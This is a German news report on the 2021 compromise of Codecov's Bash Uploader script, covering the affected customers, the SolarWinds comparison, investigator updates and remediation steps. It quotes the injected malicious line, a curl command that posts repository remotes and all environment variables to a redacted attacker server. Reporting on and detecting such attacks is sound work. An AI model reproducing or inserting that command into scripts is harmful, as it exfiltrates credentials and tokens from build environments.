Codecov: Gehacktes Entwickler-Tool Bash Uploader zum Datendiebstahl missbraucht

Inhaltsverzeichnis

Das Unternehmen Codecov weist in einem aktuellen Blogeintrag darauf hin, dass sein "Bash Uploader"-Skript von Unbekannten manipuliert wurde, die offenbar zwischen dem 31. Januar und dem 1. April 2021 – zunächst unbemerkt – Zugriff auf den Code hatten. Dank der Änderungen hätten die Angreifer innerhalb der genannten Zeitspanne unter bestimmten Voraussetzungen Zugangsdaten und andere Informationen aus Continuous-Integration (CI)-Umgebungen von Codecov-Kunden abgreifen können, die das Skript für ihre Repositories verwenden.

Code Coverage für namhafte Kunden

Codecov stellt Werkzeuge zur Analyse der Code Coverage, also der Testabdeckung von Programmcode im Zuge des Entwicklungsprozesses bereit. Das besagte Bash Uploader-Skript dient in diesem Zusammenhang dazu, aus verschiedenen Entwicklungsplattformen heraus Code Coverage-Reports zur weiteren Auswertung an Codecovs Server zu übermitteln. Von den Manipulationen betroffen sind (bzw. waren) laut Codecov auch die verwandten Bash Uploader-Skripts für GitHub, CircleCI und Bitrise Step. Alle anderen unterstützten (Nicht-Bash-)Uploader seien hingegen nicht betroffen.

Angaben des Unternehmens zufolge nutzen weltweit 29.000 Kunden die Codecov-Dienste für ihre Repositories, darunter bekannte Unternehmen und Organisationen wie Google, Atlassian, Procter & Gamble, GoDaddy, die Royal Bank of Canada, die Washington Post oder die Axa-Gruppe.

Jene Kunden, die potenziell von Datenkompromittierungen betroffen sind, will Codecov bereits am vergangenen Donnerstag, dem 15. April per E-Mail informiert haben. Zusätzlich werde ihnen nach dem Anmelden in der Codecov-Anwendung ein entsprechender Warnhinweis angezeigt. In diesen Fällen besteht Handlungsbedarf. Vorsichtsmaßnahmen dürften aber auch für nicht benachrichtigte Kunden empfehlenswert sein. Details dazu nennt der letzte Abschnitt dieser Meldung.

Möglicher Zugriff auf Credentials, Tokens und Keys

Einzelheiten zu den Code-Änderungen setzt Codecovs Blogeintrag "Bash Uploader Security Update" auseinander. Das Skript sei folgendermaßen modifiziert worden, wobei die IP-Adresse der Angreifer hier durch <redacted> ersetzt wurde:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<redacted>/upload/v2 || true

Durch die Skriptänderung konnten die Angreifer bei jedem Aufruf die URLs der betreffenden Repositories an ihren eigenen Server schicken lassen. Überdies hätten sie laut Codecov Credentials, Tokens und Keys abgreifen können, die im Zuge des CI-Prozesses des jeweiligen Projekts verarbeitet wurden und zur Laufzeit des Skripts abrufbar waren. Diese Daten hätten im nächsten Schritt etwa verwendet werden können, um Zugriff zu weiteren Accounts und potenziell sensiblen Daten zu erlangen – aber auch, um auf Programmcode betroffener Unternehmen zuzugreifen und diesen zu manipulieren.

Supply-Chain-Angriff: Erinnerungen an SolarWinds-Hack

Laut Codecov waren die Angreifer dank eines internen Fehlers bei der Erzeugung von Docker-Images an die Zugangsdaten zum Modifizieren des Skripts gelangt. Das Unternehmen habe, nachdem es am 1. April von den heimlichen Zugriffen erfahren habe, diese unmittelbar unterbunden und Sicherheitsmaßnahmen eingeleitet. Die zuständigen Behörden seien informiert worden; die Vorfälle würden untersucht.

Eine Meldung der Nachrichtenagentur Reuters zieht Parallelen zum SolarWinds-Hack, bei dem im Zuge eines sogenannten Supply-Chain-Angriffs manipulierte Updates über kompromittierte Server an zahlreiche Unternehmen und Behörden ausgeliefert worden waren. Auch der aktuelle Vorfall könnte weitreichende Folgen für betroffene Unternehmen haben – und in der Konsequenz auch für deren Kunden, sofern Software kompromittiert worden sein sollte. Auch die unentdeckt gebliebenen, wohl mehrfachen Zugriffe über mehrere Monate erinnern an die SolarWinds-Angriffe.

Gegenüber Reuters hat Atlassian auf Anfrage bestätigt, sich "der Situation bewusst zu sein". Man untersuche die Vorfälle, habe aber bislang keine Hinweise auf eine Kompromittierung entdeckt. Procter & Gamble, GoDaddy und die Washington Post hätten sich bislang nicht geäußert. Derzeit ist das tatsächliche Ausmaß des Vorfalls – und die Frage, ob ein SolarWinds-Vergleich gerechtfertigt ist – noch unklar.

Update 21.04.21, 11:40: Mittlerweile haben zuständige Ermittler gegenüber Reuters bestätigt, dass die Hacker den geänderten Skript-Code verwendet hätten, um beschränkten Zugriff auf hunderte von Netzwerken von Codecov-Kunden zu erlangen. Inwieweit sie die Daten bislang tatsächlich auch nutzten, ist dieser sehr vagen Formulierung nicht wirklich zu entnehmen.

Unter anderem meldeten sich gegenüber Reuters auch IBM und HPE als Codecov-Kunden zu Wort: Beide untersuchen die Vorfälle und mögliche Auswirkungen. IBM fügte hinzu, bislang keine Hinweise auf Code-Modifikationen bei IBM oder deren Kunden festgestellt zu haben.

Credentials ändern und Skript updaten

Laut Codecovs Blogeintrag können Betroffene über einen Aufruf des env-Befehls über die CI-Pipeline herausfinden, welche ihrer Keys, Tokens und anderen Daten aus den Umgebungsvariablen auslesbar sind und somit in die falschen Hände gelangt sein könnten. Jegliche sensible (Zugangs-)Daten sollten umgehend geändert werden. Das Unternehmen hat außerdem eine aktualisierte, abgesicherte Version des Bash-Uploaders bereitgestellt. Wer eine lokal gespeicherte Version des Skripts nutzt, das den String curl -sm 0.5 -d “$(git remote -v) beinhaltet, sollte diese zügig durch die neue Fassung ersetzen.

Die genannten Vorsichtsmaßnahmen erscheinen auch dann sinnvoll, wenn keine explizite Benachrichtigung durch Codecov erfolgte. Lediglich On-Premises-Versionen, bei denen der Bash-Uploader nicht via codecov.io/bash bezogen wird, sind laut Codecov allerdings nur mit sehr geringer Wahrscheinlichkeit betroffen.

(ovw)